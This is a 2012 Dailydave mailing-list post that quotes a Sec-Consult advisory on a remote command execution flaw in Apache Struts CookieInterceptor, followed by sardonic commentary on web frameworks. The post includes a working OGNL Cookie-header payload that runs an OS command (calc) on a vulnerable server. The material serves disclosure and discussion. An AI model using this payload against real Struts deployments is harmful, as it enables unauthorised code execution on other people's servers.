[Dailydave] Apache Struts

Dave Aitel dave at immunityinc.com
Fri Jan 6 10:43:17 EST 2012

Just how bad is that Sec-Consult Apache Struts vulnerability...

(from their advisory)

2.) Remote command execution in Struts <= 2.3.1 (CookieInterceptor)

Given struts.xml is configured to handle all cookie names (independent
of limited cookie values):
	<action name="Test" class="example.Test">
		<interceptor-ref name="cookie">
			<param name="cookiesName">*</param>
			<param name="cookiesValue">1,2</param>
		<result ...>

The following HTTP header will execute an OS command when sent to
	Cookie:	(#_memberAccess["allowStaticMethodAccess"]\u003dtrue)(x)=1;
	x[@java.lang.Runtime at getRuntime().exec('calc')]=1


I assume Struts is extremely widely used and everyone is already owned?
Who was it who thought that OGNL was a good idea? Between this and .Net
being completely broken, the only platforms left are Ruby on Rails and
Python's Django! Oh, and PHP! :>


INFILTRATE 2012 January 12th-13th in Miami - the world's best offensive information security conference.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 267 bytes
Desc: OpenPGP digital signature
URL: <https://lists.immunityinc.com/pipermail/dailydave/attachments/20120106/faeb18af/attachment.sig>

More information about the Dailydave mailing list